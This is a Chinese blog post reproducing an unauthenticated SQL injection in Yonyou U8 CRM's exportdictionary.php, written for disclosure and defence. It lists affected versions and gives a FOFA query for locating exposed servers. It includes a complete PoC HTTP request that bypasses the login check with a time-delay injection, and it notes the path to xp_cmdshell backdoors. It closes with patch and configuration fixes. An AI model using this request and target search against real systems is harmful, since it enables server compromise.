用友U8-CRM-exportdictionarySQL注入

最新推荐文章于 2024-10-13 19:14:41 发布
最新推荐文章于 2024-10-13 19:14:41 发布
阅读量414 收藏 8
点赞数 14
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/142184130
版权

0 免责声明

请注意,使用本文章提供的任何信息所引发的任何后果,包括直接或间接的损失,均由使用者自行承担。我们强烈建议不要利用文中技术从事非法活动。如发现侵权问题,请及时告知以便我们删除相关内容。

1 漏洞名称

用友U8-CRM-exportdictionary-sql注入

产品介绍

用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。

3 漏洞威胁


用友 U8 CRM客户关系管理系统 exportdictionary.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。

影响范围:

V16.1, V16.0, V15.1, V15.0, V13

漏洞环境 

FOFA:

title="用友U8CRM"

 

漏洞复现

PoC

GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:4%27-- HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bgsesstimeout-;
Connection: close

 

sqlmap验证

 

6 修复建议


第一步:在配置文件尾部追加如下段落即可

配置文件: U8SOFT\turbocrm70\apache\conf\httpd.conf,

在末尾添加一个配置:

Require local

其中,需要将中的u8安装路径修改为正确的安装路径

第二步:U8CRM存在SQL注入漏洞的安全补丁240828.zip

将解压文件中的U8SOFT目录覆盖产品安装目录。

第三步:修改完之后重启Apache4TurboCRM70服务

 

 

 

天官赐福万无禁忌
关注
专栏目录
用友u8-ERP应用流程.doc
11-03
用友u8-ERP应用流程
用友U8-OA标准方案.docx
05-26
### 用友U8-OA标准方案知识点解析 #### 一、项目背景 - **客户背景**:文档未提供具体客户背景信息,但从整体来看,该方案是为了解决企业内部协同办公的需求而设计的。通常情况下,用友U8-OA标准方案适用于各类企...
用友U8-ERP数据字典大全
11-14
用友ERP U850、U860、U870、U890、U8V10.0、U8V11.0、U8V12.0、U8V12.5数据字典。U8常用版本非常全的数据字典。
用友U8-V13财务及供应链操作手册.pdf
01-06
### 用友U8-V13财务及供应链操作手册知识点 #### 总账日常业务处理 总账是财务会计的核心部分,负责会计核算、资金管理、报表生成等基础财务工作。在用友U8-V13系统中,总账日常业务处理流程如下: 1. 登录用友...
用友U8v11-CRM功能介绍.pptx
09-22
用友U8v11-CRM功能解析》 用友U8v11-CRM模块是企业管理系统中一个至关重要的部分,它专注于客户关系管理,涵盖了市场销售、服务等多个环节,旨在提升企业的业务效率和客户满意度。在这个系统中,CRM不仅仅是关于...
WEB应用安全测试指南–蓝队安全测试2】--超详细-可直接进行实战!!!亲测-可进行安全及渗透测试
Dreams°的博客
10-10 1979
任意文件下载漏洞不同于网站目录浏览,此漏洞不仅仅可遍历系统下 web中的文件,而且可以浏览或者下载到系统中的文件,攻击人员通过任意文件下载漏洞可以获取系统文件及服务器的配置文件等等。一般来说,他们利用服务器 API、文件标准权限进行攻击。严格来说,任意文件下载漏洞并不是一种 web漏洞,而是网站设计人员的设计“漏洞”
什么是网络安全
m0_66268916的博客
10-07 529
全站防护是基于风险管理和WAAP理念打造的安全方案,以“体系化主动安全” 取代安全产品的简单叠加,为各类Web、API业务等防御来自网络层和应用层的攻击,帮助企业全面提升Web安全水位和安全运营效率。网络安全是指通过采取必要措施,防范对网络的攻击、侵入、干扰、破坏和非法使用以及意外事故,使网络处于稳定可靠运行的状态,以及保障网络数据的完整性、保密性、可用性的能力。网络安全涉及多个层面,包括硬件、软件及其系统中数据的保护和确保网络系统的连续可靠运行,防止数据被破坏、更改、泄露。
ISO 26262标准下的汽车软件架构设计与安全要求
yayuanjingkeji的博客
10-08 390
ISO 26262标准下的汽车软件架构设计与安全要求ISO 26262标准,作为国际公认的汽车功能安全标准,为汽车电子和电气系统的软件开发提供了详尽的指导与规范。在汽车软件架构设计中,遵循ISO 26262标准不仅关乎产品的功能实现,更直接关系到车辆的安全性能。以下将从几个关键方面探讨ISO 26262标准下的汽车软件架构设计。
智能运维与问题诊断工具:提升生产环境的安全稳定性
TechEnthusiast的博客
10-09 287
Prometheus是一个开源的监控和告警系统,而Grafana是一个强大的可视化平台。两者结合使用,可以为系统提供全面的监控和分析能力。ELK Stack是一套强大的日志管理和分析工具集,能够收集、处理、存储和可视化大量日志数据。Datadog是一个全面的监控和分析平台,提供了对应用、服务器、数据库和云服务的实时监控。New Relic提供了全面的应用性能监控和诊断能力,帮助开发团队快速识别和解决问题。PagerDuty是一个事件响应平台,帮助团队快速响应并解决IT事件和中断。
msvcr100.dll丢失的解决方法,如何安全下载 msvcr100.dll 文件:完全指南
电脑修复君的博客
10-11 609
在使用 Windows 操作系统的电脑上运行某些程序或游戏时,可能会遇到一个常见的错误消息,提示缺少 msvcr100.dll 文件。这个 DLL 文件是 Microsoft Visual C++ 2010 Redistributable Package 的一部分,对于运行依赖于 C++ 的软件来说至关重要。如果你正面临 msvcr100.dll 缺失的问题,本文将引导你如何安全地下载并恢复 msvcr100.dll 文件,确保你的应用程序可以顺利运行。
数据中心物理安全的历史和演变
网络研究观
10-10 888
在当今的数字时代,数据中心托管已成为我们互联世界的支柱。
API 数据接口:使用操作流程与安全指南
Noah_ZX的博客
10-07 1044
在当今数字化高速发展的时代,API 数据接口如同构建数字世界的关键纽带,将不同的软件系统和服务紧密连接在一起。无论是企业开发者致力于提升业务效率,还是个人用户追求更便捷的数字体验,深入了解 API 数据接口的使用操作流程以及全力确保其安全性都显得至关重要。
Web3 安全:攻击与防御全景指南》
sise_2022的博客
10-07 1050
Web3 的出现代表了互联网从中心化向去中心化的过渡,这不仅仅是技术上的升级,更是对现有互联网模式的深刻变革。这一阶段的标志是用户生成内容的爆发、平台经济的兴起,以及互联网巨头的垄断地位。以太坊等区块链平台推动了智能合约和去中心化应用(dApp)的繁荣,去中心化金融(DeFi)、非同质化代币(NFT)以及去中心化自治组织(DAO)等新兴应用正迅速发展,吸引了大量投资和开发者的参与。DAO 的决策过程是公开透明的,参与者可以通过投票等方式直接影响组织的运营,避免了传统组织的集中管理问题。
大模型生图安全疫苗注入赛题解析(DataWhale组队学习)
极限突破者的博客
10-12 789
本文中,我们介绍了全球AI攻防挑战赛的背景和任务,并详细探讨了攻击与防御策略。我们补充了代码实现,包括Prompt诱导与绕过策略、批量优化与自动评估,以及模型防御机制设计。
传统身份安全的局限性
trusfort的博客
10-08 363
为了应对这一现状,业界提出了“零信任”(Zero Trust)的安全模型,而身份安全正是零信任安全模型中最重要的一环。
鸿蒙开发(NEXT/API 12)【安全单元访问开发】网络篇
鸿蒙的技术博客
10-10 495
安全单元(SecureElement,简称SE),电子设备上可能存在一个或多个安全单元,比如有eSE(Embedded SE)和SIM卡。能够充当安全单元的SIM卡,要求具备NFC功能。
PWN二进制安全修仙秘籍【第二章#二进制文件篇02】ELF文件详解
weixin_53801131的博客
10-07 808
形成一个进程镜像,每个进程都拥有独立的虚拟地址空间,这个空间如何布局是由记录在段头表中的程序头决定的。ELF文件头的e_phoff域给出了段头表的位置下面将展示一个可执行文件的程序头👇。
数据交换的金钟罩:合理利用安全数据交换系统,确保信息安全
文件数据安全交换
10-10 1085
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。因此飞驰云联的安全数据交换系统---《Ftrans Ferry跨网文件安全交换系统》,通过建立可管控可审计、防泄露、安全合规的文件交换通道,解决政府单位在网络隔离条件下, 网间数据安全收发、摆渡和共享的难题,易用便捷,充分释放IT部门人力投入。
DVWA CSRF 漏洞实践报告
最新发布
l1x1n0的博客
10-13 691
CSRF(跨站请求伪造)是一种攻击,使得攻击者能够以受害者的身份执行非预期的操作。在靶场DVWA中,我将尝试通过CSRF漏洞更改管理员密码。
用友U8-V861生产制造详解
"该资料详细介绍了用友U8-V861在生产制造领域的应用,包括关键概念、流程和计划管理。" 在用友U8-V861系统中,生产制造模块是企业资源计划(ERP)的重要组成部分,它涵盖了从需求预测、生产计划到执行的全过程。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值